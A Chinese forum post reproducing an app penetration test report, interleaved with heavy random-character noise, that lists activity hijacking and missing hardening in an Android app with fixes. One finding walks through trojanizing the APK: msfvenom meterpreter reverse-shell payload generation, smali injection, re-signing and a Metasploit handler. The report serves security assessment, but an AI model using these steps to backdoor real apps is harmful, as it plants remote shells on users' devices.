" G; l0 F2 p9 s4 g, e2 m4 L8 C& \5 L9 q. e. f' V: W4 T8 d9 l   / X6 Z* J1 Q) i* H ( C- V# Z* S% z8 r6 }" Q; u( [

2 n' b0 x* b2 i4 ?$ A7 f2 P4 |& |% H 5 p6 F1 y9 I( U4 a
7 S4 \- C/ o2 o- v8 D$ u, G1 x4 O% C1 Y9 I
) c+ F- u: T7 r9 I7 F 0 y8 y' W* D/ y% T

+ W2 I# I. F; c' m2 k! n 5 B$ w! \; y* q2 c0 h   - W/ H b, E- f( {+ j8 W9 t1 n; ^2 N, H. @; ]* s6 G5 A

. [; q; I5 E( T/ z. [# [7 O; v+ Z) w# E' } }5 X4 g

# x; l8 _3 b( ]$ [5 C8 [ 0 M- K/ {& e5 h. d+ j 1-2 测试结果 # n- P# y) B7 n& V A N8 r: k " B" i3 G% ]& K& K& _" c9 y, S

; N( }: b3 H3 d7 h- ^7 \ % o1 L+ ? T7 b* A3 j5 V

4 i# T. r! o& U* [ 5 \/ @; O; H, h9 ^* |% x: [, _   $ z5 L& [# v" T3 K2 V. s' B+ D$ _9 G$ @; S) U

1 H2 w% }0 l3 \5 {/ v# V E5 R4 K7 J6 X3 w% W

3 ~0 _# i% j- O( ]& I1 f ( }. x8 P# s2 X- [* L 2 检测结果                    3 h# l0 ]8 h7 f c2 f: h8 i6 i# J5 }

5 P/ Y' `( Z( U4 k+ Y# R# b' M2 y5 A) r: |, F+ l* G

5 c: B3 b4 _* ~- g+ ? 9 v+ a4 H8 u# ^* b8 E 2.1 某某某 3 ^6 }4 e0 b' v6 w + { Q1 E" h4 y& N

, k! E6 O( Q: Y1 j: z2 W l( m0 C% S1 e! ?# s9 v

8 T6 `. S* s; F# X( l- f9 @; t+ [" D0 i& K 2.1.1检测目标 6 P5 a( X. ?$ w* k" k- |8 B1 N! T3 K* Q) n9 z

2 d: `7 j0 U& R2 J- X6 u3 V - P! l* S1 f+ i' v! X3 o7 m3 o

4 \4 ~ K% h; {, R % C1 d) n9 `& D+ l 目标地址: 某某某某某某APP 3 d$ j6 E) @6 X6 _8 l, E1 z. P$ t5 k# r

% _. t9 l& [7 p3 Q) J# y& E* \6 D! h

7 C) i- r- T" m8 u* j; O% ] : i' G' _ R" _: N 2.1.2检测结果 # j7 H* O4 |2 u0 L1 m# [! q / G4 w& s* ?8 M/ z! c

5 ]' z! m" q; y+ ? 7 Z! D( O0 f: h3 c. m+ ]5 z

9 O/ z& |/ Z: v & z+ s6 j- X, P3 f3 r- ` 2.1.2.1 3 Z3 [2 Q! V" k' q: P" R ]3 E* G# }. n8 v$ |, b+ f2 o3 O2 ~6 [

, }$ a" T5 r$ J2 t" a ' s7 f n% Q, {4 s8 H

- D, N' L0 ]$ V8 T P1 k 5 C* ?& v6 A- j4 L% K4 j( T* i+ A 漏洞链接地址:某某某某某某APP 0 v- q5 z b9 e1 T3 I 6 }& q( s. k' F C7 v2 N

' K3 e* z* c' V$ `& R& I 4 v8 O+ F$ ^$ s) K& E8 l8 v

* C, y2 \# T3 j/ ~( w$ O) C: I7 |5 o   * r" [% ~2 [! d& D( q 9 O6 D- y R8 ^

0 ~5 A+ C8 u: \- m8 ^2 l 8 C! ~* ^1 [3 [- O

# B/ R8 ]. [8 s% a8 F* R / q4 X3 }+ f# L/ l8 [, a) h 漏洞分析及取证: 6 [+ _8 r+ t& r! [+ G" A, P 6 _6 o1 z# c. z+ r; ^; S9 C+ n/ F% }

/ T( i1 A* f4 U& _( ] 2 l6 D1 b) y. V Z2 |

2 y1 _5 S+ w2 `8 P: _ 5 t' a% W- z% e% Y( K5 m                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: / s# {- n3 {% r5 T4 x( u ! w/ D |) I2 p! N! Z, w1 \

2 L3 z2 G/ J; o) P# C; _% r 9 u- w3 \1 m$ y

3 a8 t1 w% \5 W8 Z h) V- r F( {- w6 G, S      # C1 C( X& i6 O& B) s0 w 2 ?9 O: J q' g5 I3 j8 S0 ]

' L9 ~$ }, ~" E # q9 I" z- Y1 ^4 n2 s

' S- F" t+ d. f" @$ S- P/ h$ I: }' S3 ~' {3 f; I! t6 g0 H                       " ^& N N/ @ Y* L. J7 u , x9 D; a# e9 J0 M7 M' @

" H7 B5 l, _) D' ` 2 J p3 Y( c% y

- g x) v& T$ h% n 7 ^# ?0 c7 }" Y) z5 } 3 ?( |# d b& n" G * n- p+ m+ m8 [. b C5 I0 D# |: ~

' @. C4 `( t& G7 F' n ' N/ D/ Y! _: Y3 g- [9 E l- u T

4 v8 i! R& G5 f* ?; w1 @$ N 8 h1 M t* g$ B& l 7 @" a' P4 O0 F7 d 5 a. v' n/ f, d0 @! b

8 ~ m. w( \3 P3 v3 k p& ] - B; K+ B. Z# c. B% f0 o1 U

2 U* j3 _4 `" H2 \ , ^$ G b: ~" v8 k/ B6 I% L F ! A! \, \* u4 h0 \/ ` 4 m9 H, \7 s, B5 R

. u' o- V7 S/ j) Z ( `4 t% L: X7 z! p. o; k, N9 M. @' u& f

% t% g1 {3 W6 Q) E- @8 s$ t# M8 N- R. ^ 漏洞危害:高 % c' _7 S' ~/ p* ~4 v7 I2 n , c e, M+ d, r0 Y, n! x B3 q

. ^/ s3 H3 E; a6 T q* _* {) g" y( o8 H
. K! D- m& o/ H1 ~, A 6 O0 r4 x. y2 q8 m( X6 ~) s ' f6 K% l9 ]6 r7 l5 T# [" s! C6 Q Z# X1 N1 R& `6 Z1 z% a. h) p7 h/ b# C: F) [+ @9 V4 n; m: o; m4 K4 ?1 y( Q! y% Z& _3 m. Z8 v4 @$ Z; Q4 f. @$ n. L2 X* [: z8 d6 A0 Y/ F" Z) G( }! H9 q9 U2 f, W0 b. a$ k+ Q7 t4 D9 D. y' \* v; v3 S4 K7 i5 w+ m+ ?6 b" s) z, _5 K" c4 }( N _! i i& T* m* z, S. u0 G. L5 x" R2 z! @. k. d. C# Z2 \0 W5 Z# @6 R- W% Z: [' q5 Z- ?& r) D0 ~' T% S( [+ p6 b: O4 ?. U3 I+ b3 I2 g' q& x% @% a' O1 _2 Y$ X q, M5 f; n8 L7 E. V1 n* f" W: ]. e1 p( \; y! _4 j/ k8 e& Q( |9 G1 y _' n8 v9 Q) t+ \* Y4 d) t [3 O1 |" F$ k* v) Y3 A( m) e$ k5 u1 ]! u) t" N1 M0 n& i
4 ]: t+ f2 f* ^* `2 f$ T% X. j# w' c5 T& g Z

' O ~' c4 x- ~7 I; T * i0 K$ a- |5 j/ g8 `7 g3 [0 h& J# d: m 严重程度 ' A/ f- Q$ z8 Y/ `4 i% q6 w3 C" I8 o; l2 m, K

; P x) @# Q# b: e6 Y) z# S' s % ]6 c2 O$ c4 d0 j7 ~- v 		* t. o" `+ W9 k# y" S# y$ O7 q* C6 I9 ]

; V' h; A; \6 D0 m2 g% l 2 E- \# V: r3 B ! F' m; a# ^% U3 l1 V/ {+ F7 ~+ B$ f, N7 E9 b

( E2 s) g* w6 m2 L, L; x3 } ]/ D8 {" f: |2 z G& {: B 		G2 u# v& c- N# p# f # G B1 J) Z6 C1 M3 X, t* Q! d

3 ]6 }/ h& r$ ]* h' F+ e . J8 P8 j& e4 b+ E; j - N+ d* t( |4 N! L1 P ; ?' G2 x6 H' z4 G4 G

' o! H& u: O3 l& O + ]+ b$ g+ C) m4 v1 D 		& `" T8 F' F: T' M: S( w- z4 T & q: {+ e; \& j7 t4 V

, y2 g$ H$ u* `% S. ^# P: m0 B " H5 |. i! N) T3 E3 e . u) e$ r0 ^4 ~. r$ s # E m0 P& d3 [" i

- a' X+ ^( ^9 x$ S u - O9 f0 i8 b; }9 s2 { 		' ~7 t; H2 C2 z7 Q* D( _! n, t4 \7 R1 Z- t

' v: H" ~+ B) D) }* r6 Q. P" H0 w$ \- B! k* \/ y$ P2 s7 U/ ?   ( N4 E$ r& X Z0 B+ b# R " m% L# T: M& l/ g4 {! U& |

9 B! j) V: d# B# ^6 E7 G ' |0 u9 P+ T, y2 X 		/ ?/ u& v0 j1 E7 j3 @: {1 s/ X* ` % t1 e) k$ f7 U/ n

% }6 D# q. y( d" d* y- G. v0 E 8 i, t' N# s' s( @ 9 R. L% E6 Y' n 1 U0 v# f0 a2 w8 h5 W

/ C2 f" s2 y: V+ k& y : e) U' M& |2 N) ^ 		) Z3 a z% v% h$ ?. g7 p w( W u + y8 ^/ {, c ?3 U" Q8 G2 b/ p/ f

. I1 ]- }/ r( |) h# ]" P" g) z/ {7 ~4 g/ j, y   5 B: d( u6 q. E1 j' W9 _7 v/ K5 D \# j$ H& |

9 N! x, [/ A1 k Z4 u, b1 J I & ]; @+ ^6 x4 F: {8 P
9 B" _0 ?2 `- U- d # s5 w) _! |; X
6 M# `" K1 V: o1 p! E9 x7 } 5 _8 j/ y6 `% y8 K0 F

1 J1 w) ~& d1 x % A; E3 z: G0 K" I4 B* f; `7 L. h   4 d9 N& g1 u0 i8 N- _; S " W. C8 ^, {( O) `6 N" U

4 [# _ b) r0 w% H' J+ s1 S! I' S

9 k8 q1 Z# `3 x, |# _; ^ 6 O/ ?$ V! c1 K4 W" o7 B4 ` 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 8 |& g3 b. \* {% D% `) P1 w/ R, C2 [% c' T- l" g

& _3 u, Y4 F# m1 e7 x4 v * V6 k- i$ i3 Z) F8 [

! n; E! b a6 e( [' w- s7 E 8 V4 h" ~8 g9 J! P% i/ r1 c           L- k: H5 B8 S5 I5 }' ^& m |! f( f( x8 l' X

4 b! T$ ^( q6 G) @ , v- x1 U7 Z, S( a; O

4 q4 N/ C$ f2 B4 y/ r1 a. B% I) @5 @4 j $ y: y9 k4 J" e0 u   . q2 f* w0 b" ^: }8 d6 k# k- o; n8 G& | % H, v# w2 [4 a7 M# q: }4 N. r

9 o. [- G M5 n5 _* r$ M% x7 h 6 l( H& P- g$ ?

7 f1 r- ?* ]) C6 Z ) g a( }# M$ K3 t5 e" s/ f 2.1.2.2 2 O$ }( S) x( q T, x5 \0 l5 V3 p, P( t7 N1 V

4 p6 x& E, I! S9 Q1 d8 \ / H! j( P9 a$ v: z" p" Q6 q

$ n* _& h' y3 @, [$ Y! K$ \- x7 F1 ?: N& @ 漏洞链接地址:某某某某某某APP : v8 D" `+ m2 j' f* K) C# _5 ?$ D- V% B% \

0 w6 t5 f; I8 @9 x3 C2 ?" E 2 o# t3 _; Y' ~

& S) A& T0 }: |4 w( ?3 X# h7 Y! b9 _7 [. Q# m( l0 g+ a 漏洞分析及取证: + ^' l+ G- [& q2 k# \7 V5 p- C z: k7 }

; D0 W2 j- s+ v1 I: X4 r; C- g" S$ E3 k: R! L1 G

" x2 v% W/ a3 p. x0 S5 _, r+ P% d1 S3 M, ]4 S                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: " H; `' f; K: v4 c1 o7 B . Q! s+ H o9 i8 O

7 L$ g& l- Y2 j9 n7 a$ e1 @0 h0 ?9 {) n6 |* W4 E+ b# W% X

( T) Z8 T6 Y6 [: n % f7 Q8 a. ^4 t5 C A' a8 {& T# T Metasploit 生成木马 apk + T8 n" ]' R1 p7 p! q / Y! C% ~) ~( w( l8 n, l

8 M; h s' R6 K/ ` L, j: m0 d2 Z: Z \9 N. \4 a6 g3 _; |

& E: ?9 N8 ^8 O3 d0 ? - o! V6 \" U# ^9 Q/ N9 `0 `$ m msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ) a6 s9 K; r* u4 [: p$ J ) R. |& @0 V0 \9 e' L& N* R

; U4 o1 d* @" [( \# ? ) a; \8 Y( q, ^$ A) S' d

) [3 D0 H/ p2 N5 n% k0 E8 U9 e 5 B& b4 d+ R8 i. R 反编译目标apk和木马apk : m* D2 t" H5 }- Z' F : N; U/ C2 ~9 s+ @3 y! R$ o0 Q5 T

Y$ C/ n' _0 f( R$ _8 X9 {2 S( m+ I! R g

) P+ ?2 j; h( Y2 I9 v( V# K5 i $ ?; p& ]# Z" f. h7 P _$ V apktool d target.apk
, k" P0 Y' n) z " O* p$ Z. |+ u1 j$ O apktool d cockhorse.apk / f4 O2 u9 a( m/ t& _6 Y3 Q 3 @5 `: c' m8 E4 g& q. L+ u7 {! v" W

6 |3 E) B E8 F, E! W( W5 y1 X$ u 8 c# z M% B/ a3 { s3 M8 H

$ Y% ?1 {) Z* B- t* O! b$ s + B! i' G! X4 K; q 木马 apk 注入目标 apk $ e1 S$ B" y6 `- B& B 9 B; c/ W! W! v7 ^1 k7 y. ]

& ?% Z- E# y; L$ B u 7 {' k3 j4 h; K1 U1 S- m% u' G

* m1 }' N C- }* U7 Z. D" e T+ h ( s6 A/ p/ x4 l, l7 V9 z! L 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
1 i: n7 h, N! j9 e0 m/ h , \& R" V. }; G! ^7 I4 P. G+ w invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V ) u* U4 A: V0 P* b0 P# Y! R& w 1 m7 K. x& A+ P8 j2 v

3 }- ^, ]5 i5 l" ]) t- K: m7 w# M # a6 _% y6 r( B6 _; F0 t) l

8 Z9 R O+ T) m* h , L; P @* b2 i( k& i( s 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 + E2 k9 x9 n7 Z m) a0 F% F 4 W) S3 P; a7 V7 Z. a" S) ]0 x

$ x y9 z% F5 M5 t5 r/ u: o0 x, w; ]- t& r4 b0 h

8 f$ j/ m5 P" a 9 ~! W/ [+ b3 c' |$ G 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ - x0 S7 ]& `7 q " J7 q/ @4 t8 G0 s. K% `& y( l7 x1 W

2 ^. L( \: ?0 S; X X- Y9 G9 @ ( U# A7 H2 w. I: K$ K

& Q0 T+ Z: K: s: w! B I l) X9 Q8 n+ W! M* c5 b 回编译生成最终 apk / R3 m* p8 h( Q4 K) t$ ~. T 0 w( o9 U8 h: @5 k; P6 g | C" l9 g

% ` o: I2 D: e+ e0 g0 H, x 4 O7 V0 ^9 u1 y. w7 {. @' u

D b. G: A/ R/ M# F. w0 [; ^ : e4 k6 O' u! Y/ x% I6 w. y 重新打包 & o' \; c' G. D% Y# E2 w% c9 K , F* V, `4 [* `8 c3 v! l

: g' y6 n( ]/ }# l' U$ y6 k1 H$ n5 W, h1 G) ^

, f) ?0 E r" u2 y ; @6 P; c$ I O& O0 C% Z apktool b -o repackage.apk target_app_floder % `) p k2 ?% _% K: }/ M. n& l" n! z; A, y; C k

4 [* \6 p& j2 \. N3 z1 j0 M! R* x9 C: B. H

$ d, c5 Z, C; C! R6 F 0 |) Q+ b, v: o; r7 [- g 创建签名文件,有的话可忽略此步骤 4 k& v0 B* _6 ?0 Q7 y* `0 p0 p/ p- ?( i$ A' j: r# Z; q$ `

. V9 N2 H2 h, B# Z# T0 r 6 F6 Y1 f: B) J# x u- O1 M. i

5 C8 n, f" n& U: o7 F* b4 d - _( H% R; |5 I" s keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                0 `/ g, _- {# @! \, D: Y7 U: m( R + e& \' Q$ t" {+ p

W8 ]" S$ @1 t8 i8 u' b. ~' r 4 C! K: g3 u7 w% s+ k8 f5 B4 @

5 i8 o1 c( _ B; a" ]7 U( U0 ? . E( j: n) I7 M$ r, e9 [6 z 签名,以下任选其一 4 {, ~/ G% Q: \. K! E : {# d- g$ m: ]8 d0 I

% d! X- k# v5 ]' f$ M' T ! ~. i% O6 G, R

2 f0 a+ K) Y8 K% { J& K 8 m( \$ D/ d7 y+ p& z jarsigner 方式 ) u* `$ s' W( }% Z9 R: t" ] 1 R+ t* f9 ?: c O

+ o6 s3 }1 V; V' d+ b4 b 8 d5 e! p! h L$ |

3 ?/ F% w# \9 F3 J! c1 j$ D 2 [3 X( |- A. _0 f; V3 m) z jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 0 x) K$ F; f3 H4 {& V % E8 ^; V4 W) I- _) R

( a7 Q+ N9 w2 B( N2 U $ t. }. _- z* ^0 Q; k, V

1 p; P# |3 e# L' ~+ j x1 ~ ( x; A5 _2 z: M& p1 o- A. _1 c) Z apksigner 方式 ) ~6 g! p! L3 _6 n, [ 6 v% x9 u! S9 P2 i/ [

& `* v5 w2 ]5 W 0 U8 w" I- ~1 [3 [ A

( @+ e0 s, r/ N5 q 1 _3 ~6 t* f$ I: l: A5 [3 q8 U apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk % e: y: o1 o9 s& H# v8 ~" i3 r, ^2 W, M: r% C: }1 v2 t

, l# U7 x/ H6 o1 [& J5 M7 j& u * L/ P4 w& g5 u4 k" O/ L! I

/ U9 w5 D) u; i, m6 [: ~* a i4 H3 @4 J% e: r6 K8 c7 c 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 j8 M, g" J9 [" r8 s* Y; z" M/ W0 W; W/ R

% M) Q/ x! b$ Y, @ M, U; r# ~ 4 j' _! Y# U) {6 ^0 x+ m, L

6 ]) Z( @$ ?* I+ ?+ m! v$ M 0 u/ f. n% z" Y3 M( F' X1 w6 W 验证,以下任选其一 2 z' v& ~! I! v# ~; ]% r/ v8 Z! q3 ? ; Y) y: `! S4 `9 b* O# z' G* @4 Z

' K9 i1 s X6 L+ r( A. I8 ^ ! _1 x a" P. d. z

: R* A7 u! p4 ^ : a7 O' r7 Q$ I d3 K! Q jarsigner方式 * Q4 }1 V& v( f/ N$ g- x& z; B & T) n( v6 [4 j# I+ I$ _( y5 _0 i

/ Q* E$ B( ]8 M- S# b& f: l+ u" B- |2 H4 D0 z$ \* T

0 K3 w! ]7 g9 @4 V1 P8 K " {$ w4 J* U+ m$ K0 ?% l, N jarsigner -verify repackaged.apk + y6 x5 u4 K. ^0 D: E% {9 L! L2 |3 E2 g6 E( y$ C5 X# @ Q

2 k/ s! D# g( C- n0 S 3 c( a5 F0 q6 T

& E4 K( Z1 j- L2 S0 q / k% ~ s2 g4 a7 y# X( r& F, ~ apksigner 方式 * C( b1 O- p- J' z) e7 |" h; h4 x7 N& B8 S! X' O

2 X' p7 v3 D' M* @2 {& d. P" E1 T( k7 w0 W, x* R

; m5 T' m! r2 Q4 D6 C0 ~ 5 g! d8 \) n- [0 h apksigner verify -v --print-certs repackaged.apk * g% G0 c, p! [6 q& l 4 m6 u2 R0 c; I! H4 i$ D, A% q9 s

$ m) N) Q8 Y9 f4 @, [4 ^9 V V3 j' c+ G, I2 a

- ?. ?0 J, L/ ]/ [9 `$ n2 m + k2 B1 U& @& n9 M- S keytool方式 ( t: w! M+ K! f. U' J & n* z2 F# u# a; M. d, v

3 t4 v0 p8 V6 `; C! I; U% t; z 1 N- ?/ m# J- R) _, \, Y5 C2 s3 b

+ t; I. I' |2 x7 b! K5 N1 B; D2 f8 q keytool -printcert -jarfile repackaged.apk 3 R8 \) A7 G4 j y+ {$ c) F% A 3 D0 a" O$ Y3 L, C4 H

* l7 u+ A( e9 p# m- _. V( N( v( Y" v8 `+ B0 C0 ?1 U2 |

* j. [- ~% \ c" }& f) c5 u7 P6 x" F# H# x 对齐 , N' P4 Y1 r" ^3 E* E. j 2 ^% j+ s4 Q1 P- Q6 k! w

/ A! F; p! E- Q8 a% K* g . O1 M- Q, c- t8 O1 W; A3 ^( j

% d V3 I$ ^" {9 C! R- ?; Z, L " I B4 q/ }3 D$ Y" E& \ 字节对齐优化 " H& R" r' q" m, G, P. v' j : b5 [% O0 J# o; s: f' M

5 k/ T3 y3 E0 V0 m! ^9 R / k: I, V4 }; Q# Z2 h9 d1 C

& Z6 D/ |. t+ e5 ]- \, U- Q # g6 ?! A5 M: `' W6 l+ P% | zipalign -v 4 repackaged.apk final.apk 8 s" Q9 a4 H1 L- w 1 A- Y' \+ ], W6 l1 l9 Z

5 w) h! s5 f/ M) @, e6 |1 F0 t' w ' J6 x# ^3 X) P

6 s2 I5 r$ I" U& Y) w % c1 }3 i1 H7 c0 v. h' Z" g! } 检查是否对齐 - h0 Y& X8 X7 h9 ? 0 Z0 ]0 \+ N5 K/ v

. j. q" C) G) T1 L% h+ f7 c! N& l+ y; r1 ]1 T- F

! J1 y) f h4 h% B 1 l! _. X" m; v. t zipalign -c -v 4 final.apk 0 P- \: i' o7 [. |8 ~# d 2 Q# H* c6 g" k% G- F) t+ z+ {

6 b/ z- A" z, v1 q# T; j2 R- @) R. }+ q

! \6 @9 Q" e. d) }1 g0 ] 6 J2 \ j6 V `: X0 ]& [ L1 S 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 - e. l+ D; @4 M " p6 m, ]: T7 n+ Z+ q) m9 o

4 g. } I/ c7 }+ R# d * T$ H) \ X" H/ O) g5 f

7 h7 Y% ]3 T; L7 A' ?6 C0 N, ~ ; a7 M' x) L$ f6 m7 N" t; J 启动Metasploit控制台,配置参数等待上线 7 m0 `2 s$ q# u* q- r0 ] $ g; ^$ |7 |# i& R

: i. k% ]- `- w& i 6 k; ^0 I: }- @- w

9 ?8 D/ C. O) |; W1 Q 7 T6 C& _0 S/ [; j 在终端依次输入如下命令 * l( Q$ H: g' W1 X$ d: r7 ^ ! Q& t# W J" M* [8 ?, N& O& i

2 l" |% |# J5 w% O% I/ f/ ] + L: p9 E! X5 {% \8 |

1 v# E+ B" K; [ H3 P4 w 8 |! |. B* m6 \/ a* ^$ e/ Y8 z msfconsole - V3 `: h6 }! J; |% l7 L$ H$ ^ ! R6 D" x& r; S' I) q6 ]) S' i

5 T7 B5 b+ h- R 7 _+ c; ?' M$ q8 J( v1 K; y: H# E

7 W3 R9 U' T5 z; I/ @, z% w3 p, l; ^+ m- a$ f/ t3 B+ R, l use exploit/multi/handler $ r" N; U# h; r& u$ F/ e- a $ x, l4 B E @

, \7 f) {' W4 X5 D - V' e3 A. g$ J% O4 ?

) w, G9 l8 K, m. r" d- W # }( h) |1 ~9 X( y7 \+ ]* B set PAYLOAD android/meterpreter/reverse_tcp $ L. W) w# J, V; o$ `! b 5 a; H+ a+ a1 J" [5 y+ y, P9 k

1 p5 c- S$ O& W + m$ l+ k2 R! E& N+ V

8 u2 v9 K* K* Y$ U7 N! Q% l+ ]5 @% Y4 G& D9 {4 e+ \9 V set LHOST 192.xxx.xx.xx 9 B+ I, J' h8 y7 P: Z2 ~5 D% {2 n3 s; L

# b, N4 Y) y! |" b: _, X S) T% m/ L, f" d0 i5 |- J

( G+ E( Z3 ]* ?/ B) q' t ) R" J4 g# z- N. @ set LPORT 4444 ( a7 R7 n" _! ~( q( A) G7 C$ s8 O& ~. c# p+ P' V/ z

8 @. R; _2 V+ C3 D' o6 q 1 l( q" V5 T/ ]% N7 `% q

5 l1 A. {; v5 i5 G; J8 `) W _9 H, G; M) ?1 Z$ O4 R exploit : ~7 q+ ^/ C) n' ^" t5 z 3 L3 v* s* W0 K; E$ J

- D. J0 E# O2 |- c8 g0 D C) r6 O( ~9 k8 }2 s

3 t% ? A2 o+ A7 \/ o, x J1 [, Z! c$ J4 |) l' T 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               1 T* n2 E0 d5 t4 t % Y! F) ]+ Y" ^

) F# m+ X0 X5 E0 T H- q" l! G/ Y9 M4 k ; x- k4 z1 M. e! U

% z4 Q- `7 A) m0 c 2 z3 i9 a$ ^: a4 l7 ?! ]+ \ 漏洞危害:中 & A s y' Z1 w$ M 0 Q' w* n) C6 O- j& V, D6 c

" g( t4 l7 D6 t: g& F: C 6 _% d) }. `! S6 n1 Y
3 {0 b$ q" d: k- K# [' u% H8 e+ V0 w6 N, |& C8 J ( T- [ N* q! p T. B, l ; h" K$ N& M# |0 T1 P1 L+ R, c5 Q4 ]/ X ! G* ^" B* |, l* r" ]& {" l( c- `, @, g0 G# }9 q3 \0 ]& j) V& q2 \& G# E& |3 u# n' A+ K) H, s3 P% K% R, \ i& G/ q0 [+ w, ]1 u0 N ?) D& p B. Y; D0 c4 _$ `. l# O, ]7 x) y P3 u& z. G1 ?/ A. I" t7 U9 s M6 [* F7 }3 r' D- a; A% r, V( Y& w8 Z+ _3 Q* J: Y; q/ K, t2 d5 J5 S# S9 ^6 m3 n! v3 P+ ~, F9 l! K1 X' N, [; W, V Q) Q8 R" f! L. j1 \3 \1 q8 n5 n2 g8 W. S" n Z) E. |& N# v6 }4 Q6 y8 c n3 N2 u& E( @# i! T% ?: u; _ ~6 \ v' N9 l, f r8 \1 t, _ m* D) {2 ~* \ |/ S! @# Q" X7 z! _; V7 E0 U8 b0 ~5 M3 F. a; J9 }5 X5 T! K6 ^ s5 u% v1 H* L6 O( T2 q. t9 ?) I
& {' M# K6 t% v/ W' N+ b 5 E2 Z: l3 |6 Q3 K$ M

6 |3 z; W5 K. W, N( n$ q1 @ 5 C: b, h( u( |1 D5 q& T* [ 严重程度 : }7 [/ n8 E, ~- [' d2 i' d& u6 l4 c / _+ E% R6 @: t: t6 ^! c, p9 ]* ?

6 |( P; H1 y) o9 J ! ?- _5 w# x% e+ V* M 		/ J2 O: b6 y' A4 U3 @; e4 x & @9 G2 [8 ~7 g2 O1 q) g7 e

0 e& Y- W) ?6 {/ M) y9 @2 D 6 y- \! [( x+ i. Z' ?. U # U+ ^4 [9 y- u7 r$ q* { ( G- s+ x: k; t ^/ A

# y6 U0 X& y( @5 z 9 n! ^: E# \1 W 		" f% F# s( w4 Z" T4 d) h + { ^& o& ?7 O/ }2 d7 u I- C/ r

2 U+ Y1 Z: |: P, \* ~- J% M5 t$ V % k8 E3 @; _' Z+ A i- b& C1 t* J 6 E/ m- e3 W! O. E5 O/ E, u) F% x ! x% l e2 g4 f% M

" J9 y4 b- j' K) m : h& m1 k$ ]; Y9 B: R 		( d' u5 T' @( Z - @- N$ x* | S* Y) W* K

+ G% p n/ N. F" | A. d , P* b* l+ \4 O 6 `- Y/ E0 E! Y# y' z5 @# w1 Q6 M* d& w* B

1 X) l5 t: z$ g4 x) @. T0 a2 m6 D5 n- |' r! m. F2 L 		3 ~( b) g5 e# ~. z+ }* a9 G1 U4 q% m% q4 u: f F. ~' q& V3 U 2 }# y& n9 n/ T + U& B1 D8 p H

3 W% v2 s3 S+ ]4 i; `1 u, d * s+ o, l& G' r4 E   " d2 r9 r: i) @9 y2 `7 j/ r+ E" l7 m* Z7 u5 ~ B/ O! }

+ I% Y0 B5 K+ V) W+ f0 j # f0 L% J& J( e+ D( Z 		8 ~9 a! g. \, p # l+ X4 p+ \6 l" G* l

1 o" T4 y3 z2 A0 J $ c5 h2 l& Q( z0 w 0 Q) ^' y+ M3 l* \# Q7 n$ M% O! z/ S7 ]0 l

/ h- |2 @$ C, k, H, ^ ' z, G3 I% ^) \: ^$ d 		' |6 a+ _( B( {" n/ F; N , ^- B7 m7 u$ Z, F7 [ / L( N: f) O/ U& A0 c8 a # y! o- X5 ]9 B8 p6 `; t0 j

4 t& |$ O: ?' G5 S6 [* | l' e* a5 r9 v" {; h( z1 K   4 s) Y) Y8 L+ j* f& y$ W; U0 F / d5 L9 v4 c. T" e

. k/ I7 B. \! y/ _! J0 h / o: C3 q9 R0 i7 s4 d
4 w& S$ v w( i6 m : a& r* i# M% ?* e$ m9 m. V
" i, W8 V+ X8 `) T& X4 R % n- T, k. p; O, H. p

, G& q3 k) L: b, V7 Z " k( D6 c6 q/ a. |   / e4 ^( l4 g0 x, Z ! s5 h& Z2 h5 N2 i' P

0 d5 i5 D6 L; O: U1 a; U; b* a+ ?! t 3 V% A: ^% b V& `, Z: M

. a/ }! R$ H/ A9 ~7 |9 y & M3 q+ x. q$ J0 C 修复方法: 4 t9 P! g4 b4 v' I5 O5 u: t/ {* }1 W$ F8 N

5 T. H9 t: ]9 O9 P) d( }, J5 i( c8 d. C

1 k8 _1 l1 u ^$ P+ z8 {+ \ : }- D! T) O) f5 \. B8 \' a               1. APP 启动时应做签名校验防止二次打包。
# B' j# A. n% k, ~7 z. A' _! e# a7 z + I& g$ ~% L+ V5 g. W8 s5 A 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 % \# T. p( M7 D ( T6 d' C5 U& K" @$ W: m

) g+ `' |+ e; x / m) q- _; `9 {: |/ q: Q e8 J ; Q( l1 r9 V9 q* Q1 o/ x6 x & h% U, o ?& ?7 V1 P p- V: h

$ |6 A. z9 d1 x2 G. q " S ]& `* Z6 E   * Y# H j9 c* w) y' G1 q" `8 U8 E( d$ f" k2 S ^" L" ^

: r- a' t. ]* e # s# n1 F8 ]4 U8 L8 |3 L % w n# A2 h; V6 {$ `7 M, p , q" J- T, i. p- r* s- A# n

8 g6 b6 `7 f. ~8 g8 ^5 U4 S 9 f- ?/ l: w5 X. k! @! l" z2 n
( N( F: B v" x7 H/ o4 ^% `9 n6 Q ' v* q$ h( d8 V* ~% e+ v5 J* z7 Q

2 A- r2 p( D7 O% f+ V ]8 ?# G1 Z3 p( T8 k" V9 x4 p& o
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表